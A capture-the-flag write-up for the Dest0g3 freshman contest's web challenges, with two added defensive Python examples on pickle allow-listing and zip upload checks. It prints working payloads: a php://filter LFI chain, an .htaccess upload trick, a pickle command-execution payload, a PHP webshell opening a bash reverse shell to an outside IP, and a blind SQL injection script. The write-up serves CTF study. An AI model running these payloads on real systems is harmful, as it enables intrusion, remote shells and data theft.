Dest0g3 520 Freshman Welcome CTF

Web Section WriteUp

phpdest

Opening the challenge gives the source code:

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

It is easy to see that the vulnerability is in require_once; a search turned up the following article:

https://www.anquanke.com/post/id/213235

payload

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

EasyPHP

The source is given here as well:

<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?>

A quick analysis shows that the flag is printed as soon as the handler registered with set_error_handler fires.

Since there is a string concatenation right below it, passing an array as the POST parameter raises an error and triggers that function.

SimpleRCE

Source is given again; it allows command execution:

<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

Given how much is filtered, the first thing that comes to mind is a non-alphanumeric payload to bypass the filter.

Reference: this article by yu: https://blog.csdn.net/miuzzx/article/details/109143413?spm=1001.2014.3001.5502

funny_upload

Learned a new use of .htaccess, combined with PHP stream wrappers (pseudo-protocols) to bypass the content filter.

First, use base64 encoding to get past the content filter.

Then let .htaccess have the file parsed as PHP, with the wrapper decoding it on the way in:

Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-php
php_value auto_append_file "php://filter/convert.base64-decode/resource=lnk.jpg"

But when executing commands there was no output; presumably disable_functions is blocking them.

Use file_get_contents instead.

Guess that the flag is in the root directory as well.

EasySSTI

After logging in, the username is reflected back; given the challenge title, try SSTI.

It works, but a quick fuzz shows that most of the common keywords are filtered, including . ' " [ _ and spaces.

From a writeup I learned that set can be used to obtain the keywords and bypass the filter.

The PoC is the same, but in Burp the request has to be sent twice: the first sets the variable and produces a 500 error, the second returns the flag; spaces are replaced with %0a.

middle

Pickle deserialization, but restricted to the config module only, and the referenced attribute or method names must not contain __.

import os
import config
from flask import Flask, request, session, render_template, url_for,redirect,make_response
import pickle
import io
import sys
import base64


app = Flask(__name__)


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module in ['config'] and "__" not in name:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/')
def show():
    base_dir = os.path.dirname(__file__)
    resp = make_response(open(os.path.join(base_dir, __file__)).read()+open(os.path.join(base_dir, "config/__init__.py")).read())
    resp.headers["Content-type"] = "text/plain;charset=UTF-8"
    return resp

@app.route('/home', methods=['POST', 'GET'])
def home():
    data=request.form['data']
    User = restricted_loads(base64.b64decode(data))
    return str(User)

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True, port=5000)

config/__init__.py:
import os
def backdoor(cmd):
    # I also modified this a bit here
    if isinstance(cmd,list) :
        s=''.join(cmd)
        print("!!!!!!!!!!")
        s=eval(s)
        return s
    else:
        print("??????")


But a backdoor function is provided, so we build the payload with pker:

cfbk = GLOBAL('config', 'backdoor')
cfbk(["__import__('os').popen('cat /flag.txt').read()"])
return

Commands can then be executed.
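The lesson of this challenge is that restricting find_class to a module is only as strong as the weakest callable that module exports. As an added example (not the challenge's code), here is a constructed config module standing in for the real one, the challenge's module-level find_class beside a name-level allow list, and a bare GLOBAL reference that the first policy resolves and the second rejects; nothing is executed beyond resolving the reference.

```python
import io
import pickle
import sys
import types

# Constructed stand-in for the challenge's config module: one legitimate
# class plus a dangerous helper (the role backdoor() plays on the page).
config = types.ModuleType("config")
class User:
    def __init__(self, name="guest"):
        self.name = name
def helper(cmd):
    raise RuntimeError("dangerous helper reached")  # never called here
User.__module__ = "config"  # so pickle records the class as config.User
config.User, config.helper = User, helper
sys.modules["config"] = config

class ModuleOnlyUnpickler(pickle.Unpickler):
    """The challenge's policy: any name in 'config' that lacks '__'."""
    def find_class(self, module, name):
        if module in ["config"] and "__" not in name:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("forbidden %s.%s" % (module, name))

class AllowListUnpickler(pickle.Unpickler):
    """Hardened policy: exact (module, name) pairs, not whole modules."""
    ALLOWED = {("config", "User")}
    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("forbidden %s.%s" % (module, name))

# Constructed inputs: a benign User, and a bare GLOBAL reference to
# config.helper (opcode 'c' = GLOBAL, '.' = STOP); nothing gets called.
BENIGN = pickle.dumps(User("alice"))
HELPER_REF = b"cconfig\nhelper\n."

def resolve(unpickler_cls, data):
    try:  # loaded object, or 'rejected' when find_class refuses it
        return unpickler_cls(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return "rejected"

def policy_results():
    return {
        "module_only_benign": resolve(ModuleOnlyUnpickler, BENIGN).name,
        "module_only_helper": resolve(ModuleOnlyUnpickler, HELPER_REF) is helper,
        "allowlist_benign": resolve(AllowListUnpickler, BENIGN).name,
        "allowlist_helper": resolve(AllowListUnpickler, HELPER_REF),
    }
```

Both policies accept the legitimate User object; only the allow list refuses to hand back the helper.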

ezip

The source code is hidden inside an image.

upload.php:
<?php
error_reporting(0);
include("zip.php");
if(isset($_FILES['file']['name'])){
    if(strstr($_FILES['file']['name'],"..")||strstr($_FILES['file']['name'],"/")){
        echo "hacker!!";
        exit;
    }
    if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)!="zip"){
        echo "only zip!!";
        exit;
    }
    $Myzip = new zip($_FILES['file']['name']);
    mkdir($Myzip->path);
    move_uploaded_file($_FILES['file']['tmp_name'], './'.$Myzip->path.'/' . $_FILES['file']['name']);
    echo "Try to unzip your zip to /".$Myzip->path."<br>";
    if($Myzip->unzip()){echo "Success";}else{echo "failed";}
}

zip.php:
<?php
class zip
{
    public $zip_name;
    public $path;
    public $zip_manager;

    public function __construct($zip_name){
        $this->zip_manager = new ZipArchive();
        $this->path = $this->gen_path();
        $this->zip_name = $zip_name;
    }
    public function gen_path(){
        $chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        $newchars=str_split($chars);
        shuffle($newchars);
        $chars_key=array_rand($newchars,15);
        $fnstr = "";
        for($i=0;$i<15;$i++){
            $fnstr.=$newchars[$chars_key[$i]];
        }
        return md5($fnstr.time().microtime()*100000);
    }

    public function deldir($dir) {
        // first delete the files inside the directory:
        $dh = opendir($dir);
        while ($file = readdir($dh)) {
            if($file != "." && $file!="..") {
                $fullpath = $dir."/".$file;
                if(!is_dir($fullpath)) {
                    unlink($fullpath);
                } else {
                    $this->deldir($fullpath);
                }
            }
        }
        closedir($dh);
    }
    function dir_list($directory)
    {
        $array = [];

        $dir = dir($directory);
        while ($file = $dir->read()) {
            if ($file !== '.' && $file !== '..') {
                $array[] = $file;
            }
        }
        return $array;
    }
    public function unzip()
    {
        $fullpath = "/var/www/html/".$this->path."/".$this->zip_name;
        $white_list = ['jpg','png','gif','bmp'];
        $this->zip_manager->open($fullpath);
        for ($i = 0;$i < $this->zip_manager->count();$i ++) {
            if (strstr($this->zip_manager->getNameIndex($i),"../")){
                echo "you bad bad";
                return false;
            }
        }
        if(!$this->zip_manager->extractTo($this->path)){
            echo "Unzip to /".$this->path."/ failed";
            exit;
        }
        @unlink($fullpath);
        $file_list = $this->dir_list("/var/www/html/".$this->path."/");
        for($i=0;$i<sizeof($file_list);$i++){
            if(is_dir($this->path."/".$file_list[$i])){
                echo "dir? I deleted all things in it"."<br>";
                @$this->deldir("/var/www/html/".$this->path."/".$file_list[$i]);
                @rmdir("/var/www/html/".$this->path."/".$file_list[$i]);
            }
            else{
                if(!in_array(pathinfo($file_list[$i], PATHINFO_EXTENSION),$white_list)) {
                    echo "only image!!! I deleted it for you"."<br>";
                    @unlink("/var/www/html/".$this->path."/".$file_list[$i]);
                }
            }
        }
        return true;
    }
}

By triggering an error in unzip, PHP code can be executed.

First write a webshell:

<?php system("bash -c 'bash -i >& /dev/tcp/121.xxx.xxx.xxx/2333 0>&1'");?>

Then upload it and visit it to get the reverse shell.

Try SUID privilege escalation; the nl command can be used.
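The weak spot in zip.php above is ordering: entry names are checked for "../" before extractTo, but non-image files and subdirectories are only removed after extraction, and the function exits before that cleanup when extractTo reports failure. As an added example (not the challenge's code), here is the same policy in Python applied before extraction, judged from the archive listing alone, with constructed sample archives.

```python
import io
import posixpath
import zipfile

ALLOWED_EXT = {"jpg", "png", "gif", "bmp"}  # zip.php's $white_list

def zip_policy_violations(data: bytes):
    """List every entry that breaks the upload policy, judged from the
    central directory alone, before a single byte is written to disk."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Anything that could leave the target directory. normpath also
            # catches 'a/../../x', which a plain search for '../' would miss.
            if (name.startswith("/") or "\\" in name
                    or posixpath.normpath(name).split("/")[0] == ".."):
                problems.append(f"{name}: escapes the extraction directory")
            elif info.is_dir() or "/" in name:
                problems.append(f"{name}: subdirectories are not allowed")
            else:
                ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
                if ext not in ALLOWED_EXT:
                    problems.append(f"{name}: extension '{ext}' is not an image")
    return problems

def build_zip(entries):
    """Constructed test archive from (name, bytes) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries:
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed samples: a clean upload and one carrying three policy breaks.
GOOD_ZIP = build_zip([("cat.jpg", b"\xff\xd8\xff"), ("dog.png", b"\x89PNG")])
BAD_ZIP = build_zip([
    ("cat.jpg", b"\xff\xd8\xff"),
    ("shell.php", b"<?php echo 1; ?>"),  # zip.php deletes this only after extracting
    ("sub/x.png", b""),                   # zip.php recurses into this only after extracting
    ("../up.png", b""),                   # the one case zip.php does check up front
])
```

An archive with a non-empty result is refused as a whole, so nothing ever lands in the web root to be cleaned up later.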

Really Easy SQL

A phishing site, probably there purely to log credentials; INSERT injection.

The hint gives the blacklist:

$black_list=array('union','updatexml','order','by','substr',' ','and','extractvalue',';','sleep','join','alter','handler','char','+','/','like','regexp','offset','sleep','case','&','-','hex','%0','load');

Use benchmark instead of sleep, and %0a instead of spaces.

import time
import requests

# $black_list=array('union','updatexml','order','by','substr',' ','and','extractvalue',';','sleep','join','alter','handler','char','+','/','like','regexp','offset','sleep','case','&','-','hex','%0','load');
url = "http://2f597fa9-55a9-4661-abfb-d700be2f5a7c.node4.buuoj.cn:81/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789,{}-']
res = ''

# right(..., i) followed by ascii() yields the i-th character from the end,
# so the result is built back to front by prepending each recovered character.
for i in range(1, 60):
    for j in string:
        time.sleep(1)
        #payload = f"username='or(if((ascii(right((select%a0group_concat(schema_name)%a0from%a0information_schema.schemata),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        #payload = f"username='or(if((ascii(right((select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='ctf'),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        #payload = f"username='or(if((ascii(right((select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_name='flaggg'),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        payload = f"username='or(if((ascii(right((select%a0group_concat(cmd)%a0from%a0ctf.flaggg),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        try:
            headers = {'Content-Type':'application/x-www-form-urlencoded'}
            requests.post(url=url, data=payload, headers=headers, timeout=1.5)
        except requests.exceptions.Timeout:
            # a timeout means the benchmark() branch ran, i.e. the guess was right
            res = chr(j)+res
            print(res)
            break

Easy SQL

Same as the previous challenge.

Author: 秋秋晚

Published: 2022-05-30

Updated: 2023-01-10
